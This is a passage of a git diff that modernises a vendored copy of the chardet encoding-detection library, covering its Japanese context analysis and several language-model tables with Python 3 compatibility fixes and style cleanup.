if finalsub < 0.0: return VISUAL_HEBREW_NAME - # (finalsub > 0 - Logical) or (don't know what to do) default to Logical. + # (finalsub > 0 - Logical) or (don't know what to do) default to + # Logical. return LOGICAL_HEBREW_NAME def get_state(self): # Remain active as long as any of the model probers are active. - if (self._mLogicalProber.get_state() == constants.eNotMe) and \ - (self._mVisualProber.get_state() == constants.eNotMe): - return constants.eNotMe - return constants.eDetecting + if (self._mLogicalProber.get_state() == eNotMe) and \ + (self._mVisualProber.get_state() == eNotMe): + return eNotMe + return eDetecting diff --git a/thirdparty/chardet/jisfreq.py b/thirdparty/chardet/jisfreq.py index 5fe4a5c3f..064345b08 100644 --- a/thirdparty/chardet/jisfreq.py +++ b/thirdparty/chardet/jisfreq.py @@ -13,12 +13,12 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA @@ -28,7 +28,7 @@ # Sampling from about 20M text materials include literature and computer technology # # Japanese frequency table, applied to both S-JIS and EUC-JP -# They are sorted in order. +# They are sorted in order. 
# 128 --> 0.77094 # 256 --> 0.85710 @@ -38,15 +38,15 @@ # # Ideal Distribution Ratio = 0.92635 / (1-0.92635) = 12.58 # Random Distribution Ration = 512 / (2965+62+83+86-512) = 0.191 -# -# Typical Distribution Ratio, 25% of IDR +# +# Typical Distribution Ratio, 25% of IDR JIS_TYPICAL_DISTRIBUTION_RATIO = 3.0 -# Char to FreqOrder table , +# Char to FreqOrder table , JIS_TABLE_SIZE = 4368 -JISCharToFreqOrder = ( \ +JISCharToFreqOrder = ( 40, 1, 6, 182, 152, 180, 295,2127, 285, 381,3295,4304,3068,4606,3165,3510, # 16 3511,1822,2785,4607,1193,2226,5070,4608, 171,2996,1247, 18, 179,5071, 856,1661, # 32 1262,5072, 619, 127,3431,3512,3230,1899,1700, 232, 228,1294,1298, 284, 283,2041, # 48 @@ -565,3 +565,5 @@ JISCharToFreqOrder = ( \ 8224,8225,8226,8227,8228,8229,8230,8231,8232,8233,8234,8235,8236,8237,8238,8239, # 8240 8240,8241,8242,8243,8244,8245,8246,8247,8248,8249,8250,8251,8252,8253,8254,8255, # 8256 8256,8257,8258,8259,8260,8261,8262,8263,8264,8265,8266,8267,8268,8269,8270,8271) # 8272 + +# flake8: noqa diff --git a/thirdparty/chardet/jpcntx.py b/thirdparty/chardet/jpcntx.py index 06d396e5b..59aeb6a87 100644 --- a/thirdparty/chardet/jpcntx.py +++ b/thirdparty/chardet/jpcntx.py @@ -13,19 +13,19 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. 
-# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants +from .compat import wrap_ord NUM_OF_CATEGORY = 6 DONT_KNOW = -1 @@ -34,7 +34,7 @@ MAX_REL_THRESHOLD = 1000 MINIMUM_DATA_THRESHOLD = 4 # This is hiragana 2-char sequence table, the number in each cell represents its frequency category -jp2CharContext = ( \ +jp2CharContext = ( (0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1), (2,4,0,4,0,3,0,4,0,3,4,4,4,2,4,3,3,4,3,2,3,3,4,2,3,3,3,2,4,1,4,3,3,1,5,4,3,4,3,4,3,5,3,0,3,5,4,2,0,3,1,0,3,3,0,3,3,0,1,1,0,4,3,0,3,3,0,4,0,2,0,3,5,5,5,5,4,0,4,1,0,3,4), (0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2), @@ -125,24 +125,31 @@ class JapaneseContextAnalysis: self.reset() def reset(self): - self._mTotalRel = 0 # total sequence received - self._mRelSample = [0] * NUM_OF_CATEGORY # category counters, each interger counts sequence in its category - self._mNeedToSkipCharNum = 0 # if last byte in current buffer is not the last byte of a character, we need to know how many bytes to skip in next buffer - self._mLastCharOrder = -1 # The order of previous char - self._mDone = constants.False # If this flag is set to constants.True, detection is done and conclusion has been made + self._mTotalRel = 0 # total sequence received + # category counters, each interger counts sequence in its category + self._mRelSample = [0] * NUM_OF_CATEGORY + # if last byte in current buffer is not the last byte of a character, + # we need to know how many bytes to skip in next buffer + self._mNeedToSkipCharNum = 0 + 
self._mLastCharOrder = -1 # The order of previous char + # If this flag is set to True, detection is done and conclusion has + # been made + self._mDone = False def feed(self, aBuf, aLen): - if self._mDone: return + if self._mDone: + return # The buffer we got is byte oriented, and a character may span in more than one - # buffers. In case the last one or two byte in last buffer is not complete, we - # record how many byte needed to complete that character and skip these bytes here. - # We can choose to record those bytes as well and analyse the character once it - # is complete, but since a character will not make much difference, by simply skipping + # buffers. In case the last one or two byte in last buffer is not + # complete, we record how many byte needed to complete that character + # and skip these bytes here. We can choose to record those bytes as + # well and analyse the character once it is complete, but since a + # character will not make much difference, by simply skipping # this character will simply our logic and improve performance. 
i = self._mNeedToSkipCharNum while i < aLen: - order, charLen = self.get_order(aBuf[i:i+2]) + order, charLen = self.get_order(aBuf[i:i + 2]) i += charLen if i > aLen: self._mNeedToSkipCharNum = i - aLen @@ -151,7 +158,7 @@ class JapaneseContextAnalysis: if (order != -1) and (self._mLastCharOrder != -1): self._mTotalRel += 1 if self._mTotalRel > MAX_REL_THRESHOLD: - self._mDone = constants.True + self._mDone = True break self._mRelSample[jp2CharContext[self._mLastCharOrder][order]] += 1 self._mLastCharOrder = order @@ -166,45 +173,55 @@ class JapaneseContextAnalysis: else: return DONT_KNOW - def get_order(self, aStr): + def get_order(self, aBuf): return -1, 1 class SJISContextAnalysis(JapaneseContextAnalysis): - def get_order(self, aStr): - if not aStr: return -1, 1 + def __init__(self): + self.charset_name = "SHIFT_JIS" + + def get_charset_name(self): + return self.charset_name + + def get_order(self, aBuf): + if not aBuf: + return -1, 1 # find out current char's byte length - if ((aStr[0] >= '\x81') and (aStr[0] <= '\x9F')) or \ - ((aStr[0] >= '\xE0') and (aStr[0] <= '\xFC')): + first_char = wrap_ord(aBuf[0]) + if ((0x81 <= first_char <= 0x9F) or (0xE0 <= first_char <= 0xFC)): charLen = 2 + if (first_char == 0x87) or (0xFA <= first_char <= 0xFC): + self.charset_name = "CP932" else: charLen = 1 # return its order if it is hiragana - if len(aStr) > 1: - if (aStr[0] == '\202') and \ - (aStr[1] >= '\x9F') and \ - (aStr[1] <= '\xF1'): - return ord(aStr[1]) - 0x9F, charLen + if len(aBuf) > 1: + second_char = wrap_ord(aBuf[1]) + if (first_char == 0x82) and (0x9F <= second_char <= 0xF1): + return second_char - 0x9F, charLen return -1, charLen class EUCJPContextAnalysis(JapaneseContextAnalysis): - def get_order(self, aStr): - if not aStr: return -1, 1 + def get_order(self, aBuf): + if not aBuf: + return -1, 1 # find out current char's byte length - if (aStr[0] == '\x8E') or \ - ((aStr[0] >= '\xA1') and (aStr[0] <= '\xFE')): + first_char = wrap_ord(aBuf[0]) + if (first_char
== 0x8E) or (0xA1 <= first_char <= 0xFE): charLen = 2 - elif aStr[0] == '\x8F': + elif first_char == 0x8F: charLen = 3 else: charLen = 1 # return its order if it is hiragana - if len(aStr) > 1: - if (aStr[0] == '\xA4') and \ - (aStr[1] >= '\xA1') and \ - (aStr[1] <= '\xF3'): - return ord(aStr[1]) - 0xA1, charLen + if len(aBuf) > 1: + second_char = wrap_ord(aBuf[1]) + if (first_char == 0xA4) and (0xA1 <= second_char <= 0xF3): + return second_char - 0xA1, charLen return -1, charLen + +# flake8: noqa diff --git a/thirdparty/chardet/langbulgarianmodel.py b/thirdparty/chardet/langbulgarianmodel.py index bf5641e7b..e5788fc64 100644 --- a/thirdparty/chardet/langbulgarianmodel.py +++ b/thirdparty/chardet/langbulgarianmodel.py @@ -13,30 +13,28 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. 
-# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants - # 255: Control characters that usually does not exist in any text # 254: Carriage/Return # 253: symbol (punctuation) that does not belong to word # 252: 0 - 9 # Character Mapping Table: -# this table is modified base on win1251BulgarianCharToOrderMap, so +# this table is modified base on win1251BulgarianCharToOrderMap, so # only number <64 is sure valid -Latin5_BulgarianCharToOrderMap = ( \ +Latin5_BulgarianCharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -55,7 +53,7 @@ Latin5_BulgarianCharToOrderMap = ( \ 62,242,243,244, 58,245, 98,246,247,248,249,250,251, 91,252,253, # f0 ) -win1251BulgarianCharToOrderMap = ( \ +win1251BulgarianCharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -74,13 +72,13 @@ win1251BulgarianCharToOrderMap = ( \ 7, 8, 5, 19, 29, 25, 22, 21, 27, 24, 17, 75, 52,253, 42, 16, # f0 ) -# Model Table: +# Model Table: # total sequences: 100% # first 512 sequences: 96.9392% # first 1024 sequences:3.0618% # rest sequences: 0.2992% -# negative sequences: 0.0020% -BulgarianLangModel = ( \ +# negative sequences: 0.0020% +BulgarianLangModel = ( 0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,2,3,3,3,3,3, 3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,2,2,3,2,2,1,2,2, 3,1,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,3,3,3,3,3,3,3,0,3,0,1, @@ -211,18 +209,21 @@ BulgarianLangModel = ( \ 
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, ) -Latin5BulgarianModel = { \ +Latin5BulgarianModel = { 'charToOrderMap': Latin5_BulgarianCharToOrderMap, 'precedenceMatrix': BulgarianLangModel, 'mTypicalPositiveRatio': 0.969392, - 'keepEnglishLetter': constants.False, + 'keepEnglishLetter': False, 'charsetName': "ISO-8859-5" } -Win1251BulgarianModel = { \ +Win1251BulgarianModel = { 'charToOrderMap': win1251BulgarianCharToOrderMap, 'precedenceMatrix': BulgarianLangModel, 'mTypicalPositiveRatio': 0.969392, - 'keepEnglishLetter': constants.False, + 'keepEnglishLetter': False, 'charsetName': "windows-1251" } + + +# flake8: noqa diff --git a/thirdparty/chardet/langcyrillicmodel.py b/thirdparty/chardet/langcyrillicmodel.py index e604cc73d..a86f54bd5 100644 --- a/thirdparty/chardet/langcyrillicmodel.py +++ b/thirdparty/chardet/langcyrillicmodel.py @@ -13,23 +13,21 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. 
-# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants - # KOI8-R language model # Character Mapping Table: -KOI8R_CharToOrderMap = ( \ +KOI8R_CharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -48,7 +46,7 @@ KOI8R_CharToOrderMap = ( \ 35, 43, 45, 32, 40, 52, 56, 33, 61, 62, 51, 57, 47, 63, 50, 70, # f0 ) -win1251_CharToOrderMap = ( \ +win1251_CharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -67,7 +65,7 @@ win1251_CharToOrderMap = ( \ 9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16, ) -latin5_CharToOrderMap = ( \ +latin5_CharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -86,7 +84,7 @@ latin5_CharToOrderMap = ( \ 239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255, ) -macCyrillic_CharToOrderMap = ( \ +macCyrillic_CharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -105,7 +103,7 @@ macCyrillic_CharToOrderMap = ( \ 9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27,255, ) -IBM855_CharToOrderMap = ( \ +IBM855_CharToOrderMap = ( 
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -124,7 +122,7 @@ IBM855_CharToOrderMap = ( \ 250, 18, 62, 20, 51, 25, 57, 30, 47, 29, 63, 22, 50,251,252,255, ) -IBM866_CharToOrderMap = ( \ +IBM866_CharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -143,13 +141,13 @@ IBM866_CharToOrderMap = ( \ 239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255, ) -# Model Table: +# Model Table: # total sequences: 100% # first 512 sequences: 97.6601% # first 1024 sequences: 2.3389% # rest sequences: 0.1237% -# negative sequences: 0.0009% -RussianLangModel = ( \ +# negative sequences: 0.0009% +RussianLangModel = ( 0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,1,3,3,3,3,1,3,3,3,2,3,2,3,3, 3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,2,2,2,2,2,0,0,2, 3,3,3,2,3,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,3,2,3,2,0, @@ -280,50 +278,52 @@ RussianLangModel = ( \ 0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0, ) -Koi8rModel = { \ +Koi8rModel = { 'charToOrderMap': KOI8R_CharToOrderMap, 'precedenceMatrix': RussianLangModel, 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': constants.False, + 'keepEnglishLetter': False, 'charsetName': "KOI8-R" } -Win1251CyrillicModel = { \ +Win1251CyrillicModel = { 'charToOrderMap': win1251_CharToOrderMap, 'precedenceMatrix': RussianLangModel, 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': constants.False, + 'keepEnglishLetter': False, 'charsetName': "windows-1251" } -Latin5CyrillicModel = { \ +Latin5CyrillicModel = { 'charToOrderMap': latin5_CharToOrderMap, 'precedenceMatrix': RussianLangModel, 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': constants.False, + 
'keepEnglishLetter': False, 'charsetName': "ISO-8859-5" } -MacCyrillicModel = { \ +MacCyrillicModel = { 'charToOrderMap': macCyrillic_CharToOrderMap, 'precedenceMatrix': RussianLangModel, 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': constants.False, + 'keepEnglishLetter': False, 'charsetName': "MacCyrillic" }; -Ibm866Model = { \ +Ibm866Model = { 'charToOrderMap': IBM866_CharToOrderMap, 'precedenceMatrix': RussianLangModel, 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': constants.False, + 'keepEnglishLetter': False, 'charsetName': "IBM866" } -Ibm855Model = { \ +Ibm855Model = { 'charToOrderMap': IBM855_CharToOrderMap, 'precedenceMatrix': RussianLangModel, 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': constants.False, + 'keepEnglishLetter': False, 'charsetName': "IBM855" } + +# flake8: noqa diff --git a/thirdparty/chardet/langgreekmodel.py b/thirdparty/chardet/langgreekmodel.py index ec6d49e80..ddb583765 100644 --- a/thirdparty/chardet/langgreekmodel.py +++ b/thirdparty/chardet/langgreekmodel.py @@ -13,27 +13,25 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. 
-# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants - # 255: Control characters that usually does not exist in any text # 254: Carriage/Return # 253: symbol (punctuation) that does not belong to word # 252: 0 - 9 # Character Mapping Table: -Latin7_CharToOrderMap = ( \ +Latin7_CharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -52,7 +50,7 @@ Latin7_CharToOrderMap = ( \ 9, 8, 14, 7, 2, 12, 28, 23, 42, 24, 64, 75, 19, 26, 27,253, # f0 ) -win1253_CharToOrderMap = ( \ +win1253_CharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -71,13 +69,13 @@ win1253_CharToOrderMap = ( \ 9, 8, 14, 7, 2, 12, 28, 23, 42, 24, 64, 75, 19, 26, 27,253, # f0 ) -# Model Table: +# Model Table: # total sequences: 100% # first 512 sequences: 98.2851% # first 1024 sequences:1.7001% # rest sequences: 0.0359% -# negative sequences: 0.0148% -GreekLangModel = ( \ +# negative sequences: 0.0148% +GreekLangModel = ( 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,3,2,2,3,3,3,3,3,3,3,3,1,3,3,3,0,2,2,3,3,0,3,0,3,2,0,3,3,3,0, @@ -208,18 +206,20 @@ GreekLangModel = ( \ 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, ) -Latin7GreekModel = { \ +Latin7GreekModel = { 'charToOrderMap': Latin7_CharToOrderMap, 'precedenceMatrix': GreekLangModel, 'mTypicalPositiveRatio': 0.982851, - 'keepEnglishLetter': 
constants.False, + 'keepEnglishLetter': False, 'charsetName': "ISO-8859-7" } -Win1253GreekModel = { \ +Win1253GreekModel = { 'charToOrderMap': win1253_CharToOrderMap, 'precedenceMatrix': GreekLangModel, 'mTypicalPositiveRatio': 0.982851, - 'keepEnglishLetter': constants.False, + 'keepEnglishLetter': False, 'charsetName': "windows-1253" } + +# flake8: noqa diff --git a/thirdparty/chardet/langhebrewmodel.py b/thirdparty/chardet/langhebrewmodel.py index a8bcc65bf..75f2bc7fe 100644 --- a/thirdparty/chardet/langhebrewmodel.py +++ b/thirdparty/chardet/langhebrewmodel.py @@ -15,20 +15,18 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. 
-# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants - # 255: Control characters that usually does not exist in any text # 254: Carriage/Return # 253: symbol (punctuation) that does not belong to word @@ -36,7 +34,7 @@ import constants # Windows-1255 language model # Character Mapping Table: -win1255_CharToOrderMap = ( \ +win1255_CharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -55,13 +53,13 @@ win1255_CharToOrderMap = ( \ 12, 19, 13, 26, 18, 27, 21, 17, 7, 10, 5,251,252,128, 96,253, ) -# Model Table: +# Model Table: # total sequences: 100% # first 512 sequences: 98.4004% # first 1024 sequences: 1.5981% # rest sequences: 0.087% -# negative sequences: 0.0015% -HebrewLangModel = ( \ +# negative sequences: 0.0015% +HebrewLangModel = ( 0,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,2,3,2,1,2,0,1,0,0, 3,0,3,1,0,0,1,3,2,0,1,1,2,0,2,2,2,1,1,1,1,2,1,1,1,2,0,0,2,2,0,1, 3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2, @@ -192,10 +190,12 @@ HebrewLangModel = ( \ 0,0,0,0,0,0,0,0,0,0,1,2,1,0,0,0,0,0,1,1,1,1,1,0,1,0,0,0,1,1,0,0, ) -Win1255HebrewModel = { \ +Win1255HebrewModel = { 'charToOrderMap': win1255_CharToOrderMap, 'precedenceMatrix': HebrewLangModel, 'mTypicalPositiveRatio': 0.984004, - 'keepEnglishLetter': constants.False, + 'keepEnglishLetter': False, 'charsetName': "windows-1255" } + +# flake8: noqa diff --git a/thirdparty/chardet/langhungarianmodel.py b/thirdparty/chardet/langhungarianmodel.py index d635f03c2..49d2f0fe7 100644 --- a/thirdparty/chardet/langhungarianmodel.py +++ b/thirdparty/chardet/langhungarianmodel.py @@ 
-13,27 +13,25 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants - # 255: Control characters that usually does not exist in any text # 254: Carriage/Return # 253: symbol (punctuation) that does not belong to word # 252: 0 - 9 # Character Mapping Table: -Latin2_HungarianCharToOrderMap = ( \ +Latin2_HungarianCharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -52,7 +50,7 @@ Latin2_HungarianCharToOrderMap = ( \ 245,246,247, 25, 73, 42, 24,248,249,250, 31, 56, 29,251,252,253, ) -win1250HungarianCharToOrderMap = ( \ +win1250HungarianCharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -71,13 +69,13 @@ win1250HungarianCharToOrderMap = ( \ 245,246,247, 25, 74, 42, 24,248,249,250, 31, 56, 29,251,252,253, ) -# Model Table: +# Model Table: # total sequences: 100% # first 512 sequences: 94.7368% # first 1024 sequences:5.2623% # rest sequences: 0.8894% -# negative sequences: 0.0009% -HungarianLangModel = ( \ +# negative sequences: 
0.0009% +HungarianLangModel = ( 0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3, 3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,2,2,3,3,1,1,2,2,2,2,2,1,2, 3,2,2,3,3,3,3,3,2,3,3,3,3,3,3,1,2,3,3,3,3,2,3,3,1,1,3,3,0,1,1,1, @@ -208,18 +206,20 @@ HungarianLangModel = ( \ 0,1,1,1,1,1,1,0,1,1,0,1,0,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0, ) -Latin2HungarianModel = { \ +Latin2HungarianModel = { 'charToOrderMap': Latin2_HungarianCharToOrderMap, 'precedenceMatrix': HungarianLangModel, 'mTypicalPositiveRatio': 0.947368, - 'keepEnglishLetter': constants.True, + 'keepEnglishLetter': True, 'charsetName': "ISO-8859-2" } -Win1250HungarianModel = { \ +Win1250HungarianModel = { 'charToOrderMap': win1250HungarianCharToOrderMap, 'precedenceMatrix': HungarianLangModel, 'mTypicalPositiveRatio': 0.947368, - 'keepEnglishLetter': constants.True, + 'keepEnglishLetter': True, 'charsetName': "windows-1250" } + +# flake8: noqa diff --git a/thirdparty/chardet/langthaimodel.py b/thirdparty/chardet/langthaimodel.py index 96ec054f2..0508b1b1a 100644 --- a/thirdparty/chardet/langthaimodel.py +++ b/thirdparty/chardet/langthaimodel.py @@ -13,29 +13,27 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. 
-# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants - # 255: Control characters that usually does not exist in any text # 254: Carriage/Return # 253: symbol (punctuation) that does not belong to word # 252: 0 - 9 -# The following result for thai was collected from a limited sample (1M). +# The following result for thai was collected from a limited sample (1M). # Character Mapping Table: -TIS620CharToOrderMap = ( \ +TIS620CharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -54,13 +52,13 @@ TIS620CharToOrderMap = ( \ 68, 56, 59, 65, 69, 60, 70, 80, 71, 87,248,249,250,251,252,253, ) -# Model Table: +# Model Table: # total sequences: 100% # first 512 sequences: 92.6386% # first 1024 sequences:7.3177% # rest sequences: 1.0230% -# negative sequences: 0.0436% -ThaiLangModel = ( \ +# negative sequences: 0.0436% +ThaiLangModel = ( 0,1,3,3,3,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,0,0,3,3,3,0,3,3,3,3, 0,3,3,0,0,0,1,3,0,3,3,2,3,3,0,1,2,3,3,3,3,0,2,0,2,0,0,3,2,1,2,2, 3,0,3,3,2,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,3,0,3,2,3,0,2,2,2,3, @@ -191,10 +189,12 @@ ThaiLangModel = ( \ 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, ) -TIS620ThaiModel = { \ +TIS620ThaiModel = { 'charToOrderMap': TIS620CharToOrderMap, 'precedenceMatrix': ThaiLangModel, 'mTypicalPositiveRatio': 0.926386, - 'keepEnglishLetter': constants.False, + 'keepEnglishLetter': False, 'charsetName': "TIS-620" } + +# flake8: noqa diff --git a/thirdparty/chardet/latin1prober.py b/thirdparty/chardet/latin1prober.py index ae4527c75..eef357354 100644 --- 
